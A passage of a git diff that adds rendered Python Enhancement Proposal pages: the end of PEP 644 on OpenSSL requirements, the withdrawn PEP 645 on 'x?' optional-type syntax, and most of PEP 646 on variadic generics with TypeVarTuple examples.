It was suggested to keep support for OpenSSL 1.1.0 for compatibility with +Debian 9 (Stretch). The proposal was rejected since it would complicated code +cleanup and testing. Stretch is already out of regular security support and +close to end of long-term support. By the time of Python 3.10 final release, +Debian Buster and Debian Bullseye will be available.

+

Instead Python 3.10 will gain additional documentation and a new +configure option --with-openssl-rpath=auto to simplify use of custom +OpenSSL builds [11].

+
+
+
+

Backwards Compatibility

+

Python 3.10 will no longer support TLS/SSL and fast hashing on platforms +with OpenSSL 1.0.2 or LibreSSL. The first draft of this PEP was published at +the beginning of the 3.10 release cycles to give vendors like Linux +distributors or CI providers sufficient time to plan.

+

Python’s internal copy of the Keccak Code Package and the internal +_sha3 module will be removed. This will reduce source code size by +about 280kB and code size by roughly 0.5MB. The hashlib will solely rely +on OpenSSL’s SHA-3 implementation. SHA-3 and SHAKE will no longer be available +without OpenSSL.

+
+
+

Disclaimer and special thanks

+

The author of this PEP is a contributor to OpenSSL project and employed by +a major Linux distributor that uses OpenSSL.

+

Thanks to Alex Gaynor, Gregory P. Smith, Nathaniel J. Smith, Paul Kehrer, +and Seth Larson for their review and feedback on the initial draft.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0644.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0645/index.html b/pep-0645/index.html new file mode 100644 index 00000000000..cde5846fb99 --- /dev/null +++ b/pep-0645/index.html @@ -0,0 +1,251 @@ + + + + + + + + PEP 645 – Allow writing optional types as x? | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 645 – Allow writing optional types as x?

+
+
Author:
+
Maggie Moss <maggiebmoss at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
25-Aug-2020
+
Resolution:
+
Typing-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding a ? operator for types to allow writing int? in place of Optional[int].

+
+
+

PEP Withdrawal

+

The notation T|None introduced by PEP 604 to write Optional[T] is a +fine alternative to T? and does not require new syntax.

+

Using T? to mean T|None is also inconsistent with TypeScript +where it roughly means NotRequired[T]. +Such inconsistency would likely confuse folks coming from TypeScript to Python.

+

The above represents the consensus of +typing-sig +and the sponsor of this PEP.

+
+
+

Motivation

+

Types have become a valuable and powerful part of the Python language. However, many type annotations are verbose and add +considerable friction to using type annotations. By improving the typing syntax, adding types to Python code becomes simpler +and improves the development experience for Python users.

+

In a similar vein, a PEP to introduce short hand syntax for Union types has +been approved and implemented.

+
+
+

Rationale

+

Types in Python can be quite verbose, this can be a hindrance when working towards type adoption. Making types more ergonomic, +as was done with the Union type in PEP 604 (e.g., int | str), would reduce the effort needed to add types to new and existing Python code. +The Optional annotation is used frequently in both partially and fully typed Python code bases. In a small sampling of 5 well-typed open +source projects, on average 7% of annotations included at least one optional type. This indicates +that updating the syntax has the potential to make types more concise, reduce code length and improve readability.

+

Simplifying the syntax for optionals has been discussed previously within the typing community. +The consensus during these conversations has been that ? is the preferred operator. There is no native support for unary ? in Python and this will +need to be added to the runtime.

+

Adding the ? sigil to the Python grammar has been proposed previously in PEP 505, which is currently in a deferred state. +PEP 505 proposes a:

+
+
    +
  • “None coalescing” binary operator ??
  • +
  • “None-aware attribute access” operator ?. (“maybe dot”)
  • +
  • “None-aware indexing” operator ?[] (“maybe subscript”)
  • +
+
+

Should PEP 505 be approved in the future, it would not interfere with the typing specific ? proposed in this PEP. As well, +since all uses of the ? would be conceptually related, it would not be confusing in terms of learning Python or a hindrance to quick visual comprehension.

+

The proposed syntax, with the postfix operator, mimics the optional syntax found in other typed languages, like C#, TypeScript and Swift. +The widespread adoption and popularity of these languages means that Python developers are likely already familiar with this syntax.

+
// Optional in Swift
+var example: String?
+
+// Optional in C#
+string? example;
+
+
+

Adding this syntax would also follow the often used pattern of using builtin types as annotations. For example, list, dict and None. This would allow more annotations to be +added to Python code without importing from typing.

+
+
+

Specification

+

The new optional syntax should be accepted for function, variable, attribute and parameter annotations.

+
# instead of
+# def foo(x: Optional[int], y: Optional[str], z: Optional[list[int]): ...
+def foo(x: int?, y: str?, x: list[int]?): ...
+
+# def bar(x: list[typing.Optional[int]]): ...
+def bar(x: list[int?]): ...
+
+
+

The new optional syntax should be equivalent to the existing typing.Optional syntax

+
typing.Optional[int] == int?
+
+
+

The new optional syntax should have the same identity as the existing typing.Optional syntax.

+
typing.Optional[int] is int?
+
+
+

It should also be equivalent to a Union with None.

+
# old syntax
+int? == typing.Union[int, None]
+
+# new syntax
+int? == int | None
+
+
+

Since the new Union syntax specified in PEP 604 is supported in isinstance and issubclass, the new optional syntax should be supported in both isinstance and issubclass,

+
isinstance(1, int?) # true
+issubclass(Child, Super?) # true
+
+
+

A new dunder method will need to be implemented to allow the ? operator to be overloaded for other functionality.

+
+
+

Backwards Compatibility

+

? is currently unused in Python syntax, therefore this PEP is fully backwards compatible.

+
+
+

Reference Implementation

+

A reference implementation can be found here.

+
+
+

Rejected Ideas

+

Discussed alternatives were

+
    +
  • The ~ operator was considered in place of ?.
  • +
  • A prefix operator (?int).
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0645.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0646/index.html b/pep-0646/index.html new file mode 100644 index 00000000000..3aac52cacb2 --- /dev/null +++ b/pep-0646/index.html @@ -0,0 +1,1703 @@ + + + + + + + + PEP 646 – Variadic Generics | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 646 – Variadic Generics

+
+
Author:
+
Mark Mendoza <mendoza.mark.a at gmail.com>, +Matthew Rahtz <mrahtz at google.com>, +Pradeep Kumar Srinivasan <gohanpra at gmail.com>, +Vincent Siles <vsiles at fb.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
16-Sep-2020
+
Python-Version:
+
3.11
+
Post-History:
+
07-Oct-2020, 23-Dec-2020, 29-Dec-2020
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at TypeVarTuple and typing.TypeVarTuple.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

PEP 484 introduced TypeVar, enabling creation of generics parameterised +with a single type. In this PEP, we introduce TypeVarTuple, enabling parameterisation +with an arbitrary number of types - that is, a variadic type variable, +enabling variadic generics. This enables a wide variety of use cases. +In particular, it allows the type of array-like structures +in numerical computing libraries such as NumPy and TensorFlow to be +parameterised with the array shape, enabling static type checkers +to catch shape-related bugs in code that uses these libraries.

+
+
+

Acceptance

+

This PEP was accepted for Python 3.11, with the caveat that details around +multiple unpackings in a type expression aren’t specified precisely. +This gives individual type checkers some leeway, but can be tightened +in future PEPs.

+
+
+

Motivation

+

Variadic generics have long been a requested feature, for a myriad of +use cases [4]. One particular use case - a use case with potentially +large impact, and the main case this PEP targets - concerns typing in +numerical libraries.

+

In the context of numerical computation with libraries such as NumPy and TensorFlow, +the shape of variables is often just as important as the variable type. +For example, consider the following function which converts a batch [1] +of videos to grayscale:

+
def to_gray(videos: Array): ...
+
+
+

From the signature alone, it is not obvious what shape of array [2] +we should pass for the videos argument. Possibilities include, for +example,

+
+
batch × time × height × width × channels
+

and

+
+
time × batch × channels × height × width. [3]
+

This is important for three reasons:

+
    +
  • Documentation. Without the required shape being clear in the signature, +the user must hunt in the docstring or the code in question to determine +what the input/output shape requirements are.
  • +
  • Catching shape bugs before runtime. Ideally, use of incorrect shapes +should be an error we can catch ahead of time using static analysis. +(This is particularly important for machine learning code, where iteration +times can be slow.)
  • +
  • Preventing subtle shape bugs. In the worst case, use of the wrong shape +will result in the program appearing to run fine, but with a subtle bug +that can take days to track down. (See this exercise in a popular machine learning +tutorial for a particularly pernicious example.)
  • +
+

Ideally, we should have some way of making shape requirements explicit in +type signatures. Multiple proposals [6] [7] +[9] have suggested the use of the standard generics syntax for +this purpose. We would write:

+
def to_gray(videos: Array[Time, Batch, Height, Width, Channels]): ...
+
+
+

However, note that arrays can be of arbitrary rank - Array as used above is +generic in an arbitrary number of axes. One way around this would be to use a different +Array class for each rank…

+
Axis1 = TypeVar('Axis1')
+Axis2 = TypeVar('Axis2')
+
+class Array1(Generic[Axis1]): ...
+
+class Array2(Generic[Axis1, Axis2]): ...
+
+
+

…but this would be cumbersome, both for users (who would have to sprinkle 1s and 2s +and so on throughout their code) and for the authors of array libraries (who would have to duplicate implementations throughout multiple classes).

+

Variadic generics are necessary for an Array that is generic in an arbitrary +number of axes to be cleanly defined as a single class.

+
+
+

Summary Examples

+

Cutting right to the chase, this PEP allows an Array class that is generic +in its shape (and datatype) to be defined using a newly-introduced +arbitrary-length type variable, TypeVarTuple, as follows:

+
from typing import TypeVar, TypeVarTuple
+
+DType = TypeVar('DType')
+Shape = TypeVarTuple('Shape')
+
+class Array(Generic[DType, *Shape]):
+
+    def __abs__(self) -> Array[DType, *Shape]: ...
+
+    def __add__(self, other: Array[DType, *Shape]) -> Array[DType, *Shape]: ...
+
+
+

Such an Array can be used to support a number of different kinds of +shape annotations. For example, we can add labels describing the +semantic meaning of each axis:

+
from typing import NewType
+
+Height = NewType('Height', int)
+Width = NewType('Width', int)
+
+x: Array[float, Height, Width] = Array()
+
+
+

We could also add annotations describing the actual size of each axis:

+
from typing import Literal as L
+
+
+x: Array[float, L[480], L[640]] = Array()
+
+
+

For consistency, we use semantic axis annotations as the basis of the examples +in this PEP, but this PEP is agnostic about which of these two (or possibly other) +ways of using Array is preferable; that decision is left to library authors.

+

(Note also that for the rest of this PEP, for conciseness of example, we use +a simpler version of Array which is generic only in the shape - not the +data type.)

+
+
+

Specification

+

In order to support the above use cases, we introduce +TypeVarTuple. This serves as a placeholder not for a single type +but for a tuple of types.

+

In addition, we introduce a new use for the star operator: to ‘unpack’ +TypeVarTuple instances and tuple types such as Tuple[int, +str]. Unpacking a TypeVarTuple or tuple type is the typing +equivalent of unpacking a variable or a tuple of values.

+
+

Type Variable Tuples

+

In the same way that a normal type variable is a stand-in for a single +type such as int, a type variable tuple is a stand-in for a tuple type such as +Tuple[int, str].

+

Type variable tuples are created with:

+
from typing import TypeVarTuple
+
+Ts = TypeVarTuple('Ts')
+
+
+
+

Using Type Variable Tuples in Generic Classes

+

Type variable tuples behave like a number of individual type variables packed in a +Tuple. To understand this, consider the following example:

+
Shape = TypeVarTuple('Shape')
+
+class Array(Generic[*Shape]): ...
+
+Height = NewType('Height', int)
+Width = NewType('Width', int)
+x: Array[Height, Width] = Array()
+
+
+

The Shape type variable tuple here behaves like Tuple[T1, T2], +where T1 and T2 are type variables. To use these type variables +as type parameters of Array, we must unpack the type variable tuple using +the star operator: *Shape. The signature of Array then behaves +as if we had simply written class Array(Generic[T1, T2]): ....

+

In contrast to Generic[T1, T2], however, Generic[*Shape] allows +us to parameterise the class with an arbitrary number of type parameters. +That is, in addition to being able to define rank-2 arrays such as +Array[Height, Width], we could also define rank-3 arrays, rank-4 arrays, +and so on:

+
Time = NewType('Time', int)
+Batch = NewType('Batch', int)
+y: Array[Batch, Height, Width] = Array()
+z: Array[Time, Batch, Height, Width] = Array()
+
+
+
+
+

Using Type Variable Tuples in Functions

+

Type variable tuples can be used anywhere a normal TypeVar can. +This includes class definitions, as shown above, as well as function +signatures and variable annotations:

+
class Array(Generic[*Shape]):
+
+    def __init__(self, shape: Tuple[*Shape]):
+        self._shape: Tuple[*Shape] = shape
+
+    def get_shape(self) -> Tuple[*Shape]:
+        return self._shape
+
+shape = (Height(480), Width(640))
+x: Array[Height, Width] = Array(shape)
+y = abs(x)  # Inferred type is Array[Height, Width]
+z = x + x   #        ...    is Array[Height, Width]
+
+
+
+
+

Type Variable Tuples Must Always be Unpacked

+

Note that in the previous example, the shape argument to __init__ +was annotated as Tuple[*Shape]. Why is this necessary - if Shape +behaves like Tuple[T1, T2, ...], couldn’t we have annotated the shape +argument as Shape directly?

+

This is, in fact, deliberately not possible: type variable tuples must +always be used unpacked (that is, prefixed by the star operator). This is +for two reasons:

+
    +
  • To avoid potential confusion about whether to use a type variable tuple +in a packed or unpacked form (“Hmm, should I write ‘-> Shape’, +or ‘-> Tuple[Shape]’, or ‘-> Tuple[*Shape]’…?”)
  • +
  • To improve readability: the star also functions as an explicit visual +indicator that the type variable tuple is not a normal type variable.
  • +
+
+
+

Unpack for Backwards Compatibility

+

Note that the use of the star operator in this context requires a grammar change, +and is therefore available only in new versions of Python. To enable use of type +variable tuples in older versions of Python, we introduce the Unpack type +operator that can be used in place of the star operator:

+
# Unpacking using the star operator in new versions of Python
+class Array(Generic[*Shape]): ...
+
+# Unpacking using ``Unpack`` in older versions of Python
+class Array(Generic[Unpack[Shape]]): ...
+
+
+
+
+

Variance, Type Constraints and Type Bounds: Not (Yet) Supported

+

To keep this PEP minimal, TypeVarTuple does not yet support specification of:

+
    +
  • Variance (e.g. TypeVar('T', covariant=True))
  • +
  • Type constraints (TypeVar('T', int, float))
  • +
  • Type bounds (TypeVar('T', bound=ParentClass))
  • +
+

We leave the decision of how these arguments should behave to a future PEP, when variadic generics have been tested in the field. As of this PEP, type variable tuples are +invariant.

+
+
+

Type Variable Tuple Equality

+

If the same TypeVarTuple instance is used in multiple places in a signature +or class, a valid type inference might be to bind the TypeVarTuple to +a Tuple of a Union of types:

+
def foo(arg1: Tuple[*Ts], arg2: Tuple[*Ts]): ...
+
+a = (0,)
+b = ('0',)
+foo(a, b)  # Can Ts be bound to Tuple[int | str]?
+
+
+

We do not allow this; type unions may not appear within the Tuple. +If a type variable tuple appears in multiple places in a signature, +the types must match exactly (the list of type parameters must be the same +length, and the type parameters themselves must be identical):

+
def pointwise_multiply(
+    x: Array[*Shape],
+    y: Array[*Shape]
+) -> Array[*Shape]: ...
+
+x: Array[Height]
+y: Array[Width]
+z: Array[Height, Width]
+pointwise_multiply(x, x)  # Valid
+pointwise_multiply(x, y)  # Error
+pointwise_multiply(x, z)  # Error
+
+
+
+
+

Multiple Type Variable Tuples: Not Allowed

+

As of this PEP, only a single type variable tuple may appear in a type parameter list:

+
class Array(Generic[*Ts1, *Ts2]): ...  # Error
+
+
+

The reason is that multiple type variable tuples make it ambiguous +which parameters get bound to which type variable tuple:

+
x: Array[int, str, bool]  # Ts1 = ???, Ts2 = ???
+
+
+
+
+
+

Type Concatenation

+

Type variable tuples don’t have to be alone; normal types can be +prefixed and/or suffixed:

+
Shape = TypeVarTuple('Shape')
+Batch = NewType('Batch', int)
+Channels = NewType('Channels', int)
+
+def add_batch_axis(x: Array[*Shape]) -> Array[Batch, *Shape]: ...
+def del_batch_axis(x: Array[Batch, *Shape]) -> Array[*Shape]: ...
+def add_batch_channels(
+  x: Array[*Shape]
+) -> Array[Batch, *Shape, Channels]: ...
+
+a: Array[Height, Width]
+b = add_batch_axis(a)      # Inferred type is Array[Batch, Height, Width]
+c = del_batch_axis(b)      # Array[Height, Width]
+d = add_batch_channels(a)  # Array[Batch, Height, Width, Channels]
+
+
+

Normal TypeVar instances can also be prefixed and/or suffixed:

+
T = TypeVar('T')
+Ts = TypeVarTuple('Ts')
+
+def prefix_tuple(
+    x: T,
+    y: Tuple[*Ts]
+) -> Tuple[T, *Ts]: ...
+
+z = prefix_tuple(x=0, y=(True, 'a'))
+# Inferred type of z is Tuple[int, bool, str]
+
+
+
+
+

Unpacking Tuple Types

+

We mentioned that a TypeVarTuple stands for a tuple of types. +Since we can unpack a TypeVarTuple, for consistency, we also +allow unpacking a tuple type. As we shall see, this also enables a +number of interesting features.

+
+

Unpacking Concrete Tuple Types

+

Unpacking a concrete tuple type is analogous to unpacking a tuple of +values at runtime. Tuple[int, *Tuple[bool, bool], str] is +equivalent to Tuple[int, bool, bool, str].

+
+
+

Unpacking Unbounded Tuple Types

+

Unpacking an unbounded tuple preserves the unbounded tuple as it is. +That is, *Tuple[int, ...] remains *Tuple[int, ...]; there’s no +simpler form. This enables us to specify types such as Tuple[int, +*Tuple[str, ...], str] - a tuple type where the first element is +guaranteed to be of type int, the last element is guaranteed to be +of type str, and the elements in the middle are zero or more +elements of type str. Note that Tuple[*Tuple[int, ...]] is +equivalent to Tuple[int, ...].

+

Unpacking unbounded tuples is also useful in function signatures where +we don’t care about the exact elements and don’t want to define an +unnecessary TypeVarTuple:

+
def process_batch_channels(
+    x: Array[Batch, *Tuple[Any, ...], Channels]
+) -> None:
+    ...
+
+
+x: Array[Batch, Height, Width, Channels]
+process_batch_channels(x)  # OK
+y: Array[Batch, Channels]
+process_batch_channels(y)  # OK
+z: Array[Batch]
+process_batch_channels(z)  # Error: Expected Channels.
+
+
+

We can also pass a *Tuple[int, ...] wherever a *Ts is +expected. This is useful when we have particularly dynamic code and +cannot state the precise number of dimensions or the precise types for +each of the dimensions. In those cases, we can smoothly fall back to +an unbounded tuple:

+
y: Array[*Tuple[Any, ...]] = read_from_file()
+
+def expect_variadic_array(
+    x: Array[Batch, *Shape]
+) -> None: ...
+
+expect_variadic_array(y)  # OK
+
+def expect_precise_array(
+    x: Array[Batch, Height, Width, Channels]
+) -> None: ...
+
+expect_precise_array(y)  # OK
+
+
+

Array[*Tuple[Any, ...]] stands for an array with an arbitrary +number of dimensions of type Any. This means that, in the call to +expect_variadic_array, Batch is bound to Any and Shape +is bound to Tuple[Any, ...]. In the call to +expect_precise_array, the variables Batch, Height, +Width, and Channels are all bound to Any.

+

This allows users to handle dynamic code gracefully while still +explicitly marking the code as unsafe (by using y: Array[*Tuple[Any, +...]]). Otherwise, users would face noisy errors from the type +checker every time they tried to use the variable y, which would +hinder them when migrating a legacy code base to use TypeVarTuple.

+
+
+

Multiple Unpackings in a Tuple: Not Allowed

+

As with TypeVarTuples, only one unpacking may appear in a tuple:

+
x: Tuple[int, *Ts, str, *Ts2]  # Error
+y: Tuple[int, *Tuple[int, ...], str, *Tuple[str, ...]]  # Error
+
+
+
+
+
+

*args as a Type Variable Tuple

+

PEP 484 states that when a type annotation is provided for *args, every argument +must be of the type annotated. That is, if we specify *args to be type int, +then all arguments must be of type int. This limits our ability to specify +the type signatures of functions that take heterogeneous argument types.

+

If *args is annotated as a type variable tuple, however, the types of the +individual arguments become the types in the type variable tuple:

+
Ts = TypeVarTuple('Ts')
+
+def args_to_tuple(*args: *Ts) -> Tuple[*Ts]: ...
+
+args_to_tuple(1, 'a')  # Inferred type is Tuple[int, str]
+
+
+

In the above example, Ts is bound to Tuple[int, str]. If no +arguments are passed, the type variable tuple behaves like an empty +tuple, Tuple[()].

+

As usual, we can unpack any tuple types. For example, by using a type +variable tuple inside a tuple of other types, we can refer to prefixes +or suffixes of the variadic argument list. For example:

+
# os.execle takes arguments 'path, arg0, arg1, ..., env'
+def execle(path: str, *args: *Tuple[*Ts, Env]) -> None: ...
+
+
+

Note that this is different to

+
def execle(path: str, *args: *Ts, env: Env) -> None: ...
+
+
+

as this would make env a keyword-only argument.

+

Using an unpacked unbounded tuple is equivalent to the +PEP 484 +behavior of *args: int, which accepts zero or +more values of type int:

+
def foo(*args: *Tuple[int, ...]) -> None: ...
+
+# equivalent to:
+def foo(*args: int) -> None: ...
+
+
+

Unpacking tuple types also allows more precise types for heterogeneous +*args. The following function expects an int at the beginning, +zero or more str values, and a str at the end:

+
def foo(*args: *Tuple[int, *Tuple[str, ...], str]) -> None: ...
+
+
+

For completeness, we mention that unpacking a concrete tuple allows us +to specify *args of a fixed number of heterogeneous types:

+
def foo(*args: *Tuple[int, str]) -> None: ...
+
+foo(1, "hello")  # OK
+
+
+

Note that, in keeping with the rule that type variable tuples must always +be used unpacked, annotating *args as being a plain type variable tuple +instance is not allowed:

+
def foo(*args: Ts): ...  # NOT valid
+
+
+

*args is the only case where an argument can be annotated as *Ts directly; +other arguments should use *Ts to parameterise something else, e.g. Tuple[*Ts]. +If *args itself is annotated as Tuple[*Ts], the old behaviour still applies: +all arguments must be a Tuple parameterised with the same types.

+
def foo(*args: Tuple[*Ts]): ...
+
+foo((0,), (1,))    # Valid
+foo((0,), (1, 2))  # Error
+foo((0,), ('1',))  # Error
+
+
+

Finally, note that a type variable tuple may not be used as the type of +**kwargs. (We do not yet know of a use case for this feature, so we prefer +to leave the ground fresh for a potential future PEP.)

+
# NOT valid
+def foo(**kwargs: *Ts): ...
+
+
+
+
+

Type Variable Tuples with Callable

+

Type variable tuples can also be used in the arguments section of a +Callable:

+
class Process:
+  def __init__(
+    self,
+    target: Callable[[*Ts], None],
+    args: Tuple[*Ts],
+  ) -> None: ...
+
+def func(arg1: int, arg2: str) -> None: ...
+
+Process(target=func, args=(0, 'foo'))  # Valid
+Process(target=func, args=('foo', 0))  # Error
+
+
+

Other types and normal type variables can also be prefixed/suffixed +to the type variable tuple:

+
T = TypeVar('T')
+
+def foo(f: Callable[[int, *Ts, T], Tuple[T, *Ts]]): ...
+
+
+

The behavior of a Callable containing an unpacked item, whether the +item is a TypeVarTuple or a tuple type, is to treat the elements +as if they were the type for *args. So, Callable[[*Ts], None] +is treated as the type of the function:

+
def foo(*args: *Ts) -> None: ...
+
+
+

Callable[[int, *Ts, T], Tuple[T, *Ts]] is treated as the type of +the function:

+
def foo(*args: *Tuple[int, *Ts, T]) -> Tuple[T, *Ts]: ...
+
+
+
+
+

Behaviour when Type Parameters are not Specified

+

When a generic class parameterised by a type variable tuple is used without +any type parameters, it behaves as if the type variable tuple was +substituted with Tuple[Any, ...]:

+
def takes_any_array(arr: Array): ...
+
+# equivalent to:
+def takes_any_array(arr: Array[*Tuple[Any, ...]]): ...
+
+x: Array[Height, Width]
+takes_any_array(x)  # Valid
+y: Array[Time, Height, Width]
+takes_any_array(y)  # Also valid
+
+
+

This enables gradual typing: existing functions accepting, for example, +a plain TensorFlow Tensor will still be valid even if Tensor is made +generic and calling code passes a Tensor[Height, Width].

+

This also works in the opposite direction:

+
def takes_specific_array(arr: Array[Height, Width]): ...
+
+z: Array
+# equivalent to Array[*Tuple[Any, ...]]
+
+takes_specific_array(z)
+
+
+

(For details, see the section on Unpacking Unbounded Tuple Types.)

+

This way, even if libraries are updated to use types like Array[Height, Width], +users of those libraries won’t be forced to also apply type annotations to +all of their code; users still have a choice about what parts of their code +to type and which parts to not.

+
+
+

Aliases

+

Generic aliases can be created using a type variable tuple in +a similar way to regular type variables:

+
IntTuple = Tuple[int, *Ts]
+NamedArray = Tuple[str, Array[*Ts]]
+
+IntTuple[float, bool]  # Equivalent to Tuple[int, float, bool]
+NamedArray[Height]     # Equivalent to Tuple[str, Array[Height]]
+
+
+

As this example shows, all type parameters passed to the alias are +bound to the type variable tuple.

+

Importantly for our original Array example (see Summary Examples), this +allows us to define convenience aliases for arrays of a fixed shape +or datatype:

+
Shape = TypeVarTuple('Shape')
+DType = TypeVar('DType')
+class Array(Generic[DType, *Shape]):
+
+# E.g. Float32Array[Height, Width, Channels]
+Float32Array = Array[np.float32, *Shape]
+
+# E.g. Array1D[np.uint8]
+Array1D = Array[DType, Any]
+
+
+

If an explicitly empty type parameter list is given, the type variable +tuple in the alias is set empty:

+
IntTuple[()]    # Equivalent to Tuple[int]
+NamedArray[()]  # Equivalent to Tuple[str, Array[()]]
+
+
+

If the type parameter list is omitted entirely, the unspecified type +variable tuples are treated as Tuple[Any, ...] (similar to +Behaviour when Type Parameters are not Specified):

+
def takes_float_array_of_any_shape(x: Float32Array): ...
+x: Float32Array[Height, Width] = Array()
+takes_float_array_of_any_shape(x)  # Valid
+
+def takes_float_array_with_specific_shape(
+    y: Float32Array[Height, Width]
+): ...
+y: Float32Array = Array()
+takes_float_array_with_specific_shape(y)  # Valid
+
+
+

Normal TypeVar instances can also be used in such aliases:

+
T = TypeVar('T')
+Foo = Tuple[T, *Ts]
+
+# T bound to str, Ts to Tuple[int]
+Foo[str, int]
+# T bound to float, Ts to Tuple[()]
+Foo[float]
+# T bound to Any, Ts to an Tuple[Any, ...]
+Foo
+
+
+
+
+

Substitution in Aliases

+

In the previous section, we only discussed simple usage of generic aliases +in which the type arguments were just simple types. However, a number of +more exotic constructions are also possible.

+
+

Type Arguments can be Variadic

+

First, type arguments to generic aliases can be variadic. For example, a +TypeVarTuple can be used as a type argument:

+
Ts1 = TypeVar('Ts1')
+Ts2 = TypeVar('Ts2')
+
+IntTuple = Tuple[int, *Ts1]
+IntFloatTuple = IntTuple[float, *Ts2]  # Valid
+
+
+

Here, *Ts1 in the IntTuple alias is bound to Tuple[float, *Ts2], +resulting in an alias IntFloatTuple equivalent to +Tuple[int, float, *Ts2].

+

Unpacked arbitrary-length tuples can also be used as type arguments, with +similar effects:

+
IntFloatsTuple = IntTuple[*Tuple[float, ...]]  # Valid
+
+
+

Here, *Ts1 is bound to *Tuple[float, ...], resulting in +IntFloatsTuple being equivalent to Tuple[int, *Tuple[float, ...]]: a tuple +consisting of an int then zero or more floats.

+
+
+

Variadic Arguments Require Variadic Aliases

+

Variadic type arguments can only be used with generic aliases that are +themselves variadic. For example:

+
T = TypeVar('T')
+
+IntTuple = Tuple[int, T]
+
+IntTuple[str]                 # Valid
+IntTuple[*Ts]                 # NOT valid
+IntTuple[*Tuple[float, ...]]  # NOT valid
+
+
+

Here, IntTuple is a non-variadic generic alias that takes exactly one +type argument. Hence, it cannot accept *Ts or *Tuple[float, ...] as type +arguments, because they represent an arbitrary number of types.

+
+
+

Aliases with Both TypeVars and TypeVarTuples

+

In Aliases, we briefly mentioned that aliases can be generic in both +TypeVars and TypeVarTuples:

+
T = TypeVar('T')
+Foo = Tuple[T, *Ts]
+
+Foo[str, int]         # T bound to str, Ts to Tuple[int]
+Foo[str, int, float]  # T bound to str, Ts to Tuple[int, float]
+
+
+

In accordance with Multiple Type Variable Tuples: Not Allowed, at most one +TypeVarTuple may appear in the type parameters to an alias. However, a +TypeVarTuple can be combined with an arbitrary number of TypeVars, +both before and after:

+
T1 = TypeVar('T1')
+T2 = TypeVar('T2')
+T3 = TypeVar('T3')
+
+Tuple[*Ts, T1, T2]      # Valid
+Tuple[T1, T2, *Ts]      # Valid
+Tuple[T1, *Ts, T2, T3]  # Valid
+
+
+

In order to substitute these type variables with supplied type arguments, +any type variables at the beginning or end of the type parameter list first +consume type arguments, and then any remaining type arguments are bound +to the TypeVarTuple:

+
Shrubbery = Tuple[*Ts, T1, T2]
+
+Shrubbery[str, bool]              # T2=bool,  T1=str,   Ts=Tuple[()]
+Shrubbery[str, bool, float]       # T2=float, T1=bool,  Ts=Tuple[str]
+Shrubbery[str, bool, float, int]  # T2=int,   T1=float, Ts=Tuple[str, bool]
+
+Ptang = Tuple[T1, *Ts, T2, T3]
+
+Ptang[str, bool, float]       # T1=str, T3=float, T2=bool,  Ts=Tuple[()]
+Ptang[str, bool, float, int]  # T1=str, T3=int,   T2=float, Ts=Tuple[bool]
+
+
+

Note that the minimum number of type arguments in such cases is set by +the number of TypeVars:

+
Shrubbery[int]  # Not valid; Shrubbery needs at least two type arguments
+
+
+
+
+

Splitting Arbitrary-Length Tuples

+

A final complication occurs when an unpacked arbitrary-length tuple is used +as a type argument to an alias consisting of both TypeVars and a +TypeVarTuple:

+
Elderberries = Tuple[*Ts, T1]
+Hamster = Elderberries[*Tuple[int, ...]]  # valid
+
+
+

In such cases, the arbitrary-length tuple is split between the TypeVars +and the TypeVarTuple. We assume the arbitrary-length tuple contains +at least as many items as there are TypeVars, such that individual +instances of the inner type - here int - are bound to any TypeVars +present. The ‘rest’ of the arbitrary-length tuple - here *Tuple[int, ...], +since a tuple of arbitrary length minus two items is still arbitrary-length - +is bound to the TypeVarTuple.

+

Here, therefore, Hamster is equivalent to Tuple[*Tuple[int, ...], int]: +a tuple consisting of zero or more ints, then a final int.

+

Of course, such splitting only occurs if necessary. For example, if we instead +did:

+
Elderberries[*Tuple[int, ...], str]
+
+
+

Then splitting would not occur; T1 would be bound to str, and +Ts to *Tuple[int, ...].

+

In particularly awkward cases, a TypeVarTuple may consume both a type +and a part of an arbitrary-length tuple type:

+
Elderberries[str, *Tuple[int, ...]]
+
+
+

Here, T1 is bound to int, and Ts is bound to +Tuple[str, *Tuple[int, ...]]. This expression is therefore equivalent to +Tuple[str, *Tuple[int, ...], int]: a tuple consisting of a str, then +zero or more ints, ending with an int.

+
+
+

TypeVarTuples Cannot be Split

+

Finally, although any arbitrary-length tuples in the type argument list can be +split between the type variables and the type variable tuple, the same is not +true of TypeVarTuples in the argument list:

+
Ts1 = TypeVarTuple('Ts1')
+Ts2 = TypeVarTuple('Ts2')
+
+Camelot = Tuple[T, *Ts1]
+Camelot[*Ts2]  # NOT valid
+
+
+

This is not possible because, unlike in the case of an unpacked arbitrary-length +tuple, there is no way to ‘peer inside’ the TypeVarTuple to see what its +individual types are.

+
+
+
+

Overloads for Accessing Individual Types

+

For situations where we require access to each individual type in the type variable tuple, +overloads can be used with individual TypeVar instances in place of the type variable tuple:

+
Shape = TypeVarTuple('Shape')
+Axis1 = TypeVar('Axis1')
+Axis2 = TypeVar('Axis2')
+Axis3 = TypeVar('Axis3')
+
+class Array(Generic[*Shape]):
+
+  @overload
+  def transpose(
+    self: Array[Axis1, Axis2]
+  ) -> Array[Axis2, Axis1]: ...
+
+  @overload
+  def transpose(
+    self: Array[Axis1, Axis2, Axis3]
+  ) -> Array[Axis3, Axis2, Axis1]: ...
+
+
+

